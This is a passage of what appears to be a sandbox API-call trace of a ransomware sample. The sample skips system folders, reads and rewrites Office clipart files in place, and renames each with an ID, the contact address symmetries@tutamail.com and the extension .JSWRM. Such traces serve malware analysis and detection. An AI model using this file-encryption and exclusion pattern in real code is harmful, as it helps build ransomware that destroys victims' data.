RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1ae0) returned 0x205850 [0085.947] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1ae0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1ae0, lpOverlapped=0x0) returned 1 [0085.952] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.952] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1ae0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1ae0, lpOverlapped=0x0) returned 1 [0085.953] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0085.953] CloseHandle (hObject=0x314) returned 1 [0085.953] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0085.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0085.953] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0085.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0085.953] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0085.953] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0085.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0085.953] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0085.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0085.953] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0085.953] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0085.953] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0085.953] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0085.953] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0085.953] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0171847.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0171847.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0171847.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0171847.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0085.954] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0085.954] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0085.954] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0085.954] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeaa396f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeaa396f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeac9c22, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1d18, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0172035.WMF", cAlternateFileName="")) returned 1 [0085.954] lstrcmpiW (lpString1="J0172035.WMF", lpString2=".") returned 1 [0085.954] lstrcmpiW (lpString1="J0172035.WMF", lpString2="..") returned 1 [0085.954] lstrcmpiW (lpString1="J0172035.WMF", lpString2="...") returned 1 [0085.954] lstrcmpiW (lpString1="J0172035.WMF", lpString2="windows") returned -1 [0085.954] lstrcmpiW (lpString1="J0172035.WMF", lpString2="recovery") returned -1 [0085.954] lstrcmpiW (lpString1="J0172035.WMF", lpString2="perflogs") returned -1 [0085.954] lstrcmpiW (lpString1="J0172035.WMF", lpString2="documents and settings") returned 1 [0085.954] lstrcmpiW (lpString1="J0172035.WMF", lpString2="$RECYCLE.BIN") returned 1 [0085.954] lstrcmpiW (lpString1="J0172035.WMF", lpString2="system volume information") returned -1 [0085.954] lstrcmpiW (lpString1="J0172035.WMF", lpString2="msocache") returned -1 [0085.954] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0085.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0172035.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0172035.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0172035.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.954] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0085.954] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0085.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0172035.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.955] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0172035.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0172035.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0085.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0085.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0085.955] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0085.955] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0085.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0085.955] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172035.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0172035.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0085.955] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7448) returned 1 [0085.955] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1d10) returned 0x205850 [0085.955] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1d10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1d10, lpOverlapped=0x0) returned 1 [0085.957] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.957] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1d10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1d10, lpOverlapped=0x0) returned 1 [0085.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0085.957] CloseHandle (hObject=0x314) returned 1 [0085.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0085.957] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0085.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0085.957] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0085.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0085.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0085.957] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0085.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0085.957] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0085.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0085.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0085.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0085.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0085.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0085.958] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172035.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0172035.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172035.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0172035.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0085.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0085.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0085.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0085.958] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea7d707, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xea7d707, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeac9c22, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1b74, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0172067.WMF", cAlternateFileName="")) returned 1 [0085.958] lstrcmpiW (lpString1="J0172067.WMF", lpString2=".") returned 1 [0085.958] lstrcmpiW (lpString1="J0172067.WMF", lpString2="..") returned 1 [0085.958] lstrcmpiW (lpString1="J0172067.WMF", lpString2="...") returned 1 [0085.958] lstrcmpiW (lpString1="J0172067.WMF", lpString2="windows") returned -1 [0085.958] lstrcmpiW (lpString1="J0172067.WMF", lpString2="recovery") returned -1 [0085.958] lstrcmpiW (lpString1="J0172067.WMF", lpString2="perflogs") returned -1 [0085.958] lstrcmpiW (lpString1="J0172067.WMF", lpString2="documents and settings") returned 1 [0085.958] lstrcmpiW (lpString1="J0172067.WMF", lpString2="$RECYCLE.BIN") returned 1 [0085.958] lstrcmpiW (lpString1="J0172067.WMF", lpString2="system volume information") returned -1 [0085.959] lstrcmpiW (lpString1="J0172067.WMF", lpString2="msocache") returned -1 [0085.959] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0085.959] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0172067.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.959] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0172067.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0172067.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.959] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0085.959] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0085.959] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0172067.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.959] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0172067.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0172067.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.959] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0085.959] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0085.959] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0085.959] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0085.959] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0085.959] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0085.959] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172067.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0172067.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0085.960] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7028) returned 1 [0085.960] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.960] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1b70) returned 0x205850 [0085.960] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1b70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1b70, lpOverlapped=0x0) returned 1 [0085.967] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.967] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1b70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1b70, lpOverlapped=0x0) returned 1 [0085.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0085.967] CloseHandle (hObject=0x314) returned 1 [0085.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0085.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0085.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0085.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0085.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0085.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0085.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0085.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0085.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0085.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0085.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0085.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0085.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0085.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0085.967] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172067.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0172067.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172067.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0172067.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0085.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0085.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0085.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0085.968] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea7d707, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xea7d707, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeaa396f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3198, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0172193.WMF", cAlternateFileName="")) returned 1 [0085.968] lstrcmpiW (lpString1="J0172193.WMF", lpString2=".") returned 1 [0085.968] lstrcmpiW (lpString1="J0172193.WMF", lpString2="..") returned 1 [0085.968] lstrcmpiW (lpString1="J0172193.WMF", lpString2="...") returned 1 [0085.968] lstrcmpiW (lpString1="J0172193.WMF", lpString2="windows") returned -1 [0085.968] lstrcmpiW (lpString1="J0172193.WMF", lpString2="recovery") returned -1 [0085.968] lstrcmpiW (lpString1="J0172193.WMF", lpString2="perflogs") returned -1 [0085.968] lstrcmpiW (lpString1="J0172193.WMF", lpString2="documents and settings") returned 1 [0085.968] lstrcmpiW (lpString1="J0172193.WMF", lpString2="$RECYCLE.BIN") returned 1 [0085.968] lstrcmpiW (lpString1="J0172193.WMF", lpString2="system volume information") returned -1 [0085.968] lstrcmpiW (lpString1="J0172193.WMF", lpString2="msocache") returned -1 [0085.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0085.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0172193.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0172193.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0172193.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0085.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0085.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0172193.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0172193.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0172193.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.969] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0085.969] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0085.969] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0085.969] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0085.969] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0085.969] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0085.969] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172193.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0172193.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0085.969] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12696) returned 1 [0085.969] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.969] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3190) returned 0x24d210 [0085.969] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3190, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3190, lpOverlapped=0x0) returned 1 [0086.027] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.027] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3190, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3190, lpOverlapped=0x0) returned 1 [0086.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0086.027] CloseHandle (hObject=0x314) returned 1 [0086.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0086.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0086.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0086.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0086.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0086.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.028] HeapFree (in: 